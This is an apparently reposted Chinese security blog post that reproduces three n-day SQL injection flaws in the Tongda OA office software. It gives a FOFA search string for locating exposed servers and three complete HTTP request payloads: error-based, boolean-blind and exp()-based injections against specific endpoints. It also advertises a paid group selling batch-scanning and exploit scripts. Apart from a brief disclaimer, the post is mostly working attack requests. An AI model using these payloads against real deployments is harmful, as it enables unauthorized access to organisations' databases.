【漏洞复现】（nday）3个通达OA-sql注入复现集合

【漏洞复现】（nday）3个通达OA-sql注入复现集合
2023-12-26 10:46:37 Author: 天擎攻防实验室(查看原文) 阅读量:21 收藏

0x01 阅读须知

SCA御盾实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 漏洞描述

（一） 通达OA

通达OA（Office Automation）是一款企业级协同办公软件，旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能，包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用，可以实现随时随地办公，提高工作效率和协作能力。同时，它还具备高度可定制性和扩展性，可以根据企业的实际需求进行定制开发，满足企业的个性化需求。通达OA广泛应用于各类企业，帮助企业实现数字化转型，提高管理效率和竞争力。

fofa语法：

app="TDXK-通达OA"

（二）漏洞详情

(1) tongda-result-sqli:

GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),md5(123456),1,1)a%20from%20information_schema.tables%20group%20by%20a)b)%23 HTTP/1.1Host:User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

(2) tongda-v115-swfupload_new-sqli:

POST /general/file_folder/swfupload_new.php HTTP/1.1Host:User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2Accept-Encoding: gzip
------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_ID"
1------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_NAME"
1------------GFioQpMK0vv2Content-Disposition: form-data; name="FILE_SORT"
2------------GFioQpMK0vv2Content-Disposition: form-data; name="SORT_ID"
0 RLIKE (SELECT  (CASE WHEN (substr(database(),{i},1)={ej}) THEN 1 ELSE 0x28 END))------------GFioQpMK0vv2--

(3) tongda-v116-insert-sqli:

POST /general/document/index.php/recv/register/insert HTTP/1.1Host:User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type:application/x-www-form-urlencodedAccept-Encoding: gzip
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=

漏洞poc+漏洞批量扫描脚本+漏洞exp脚本发布在知识星球

明日预告：【python专栏】SCAMagicScan扫描器poc编写教程

近期发布

付费星球

加入说明：

1.加入收费说明：

（1）现阶段扫码加入价格为¥99元，150人后涨价至¥149元，300人后涨价至¥199元（系统支持三天退款）

（2）私聊微信加入¥89元，但不支持退款

（3）转发任意一篇SCA御盾的公众号至5个50人以上安全群，在公众号加微信后凭截图发放8折优惠券

（4）投稿最新漏洞poc或复现分析文章可免费加入1年(每星期限量5人)

2. 每逢节假日会发放一定数量优惠券

3.每天日更，工作日推送1day或0day,周末推送出货多的nday，期间不定期推送实用工具或脚本

4. 进入星球后加群可提前一天解锁第二天的发布内容

5.补天半自动化交洞脚本，计划于2024年农历新年后的第一个工作周于微信群推送，价格10-50元视服务而定

6.fofaweb使用权——fofa会员key集成的专属网站可直接导出1W条以下的资产数量

7.huter积分8折充值优惠

文章来源: http://mp.weixin.qq.com/s?__biz=MzU2MzQyMjA1NA==&mid=2247484307&idx=1&sn=30ce6e409af0880354664e5c679ea869&chksm=fd0353b0efc3e99499428df1a2ffe3e90476348d8a2d980284179b44191b77aa1e1298d80b65&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh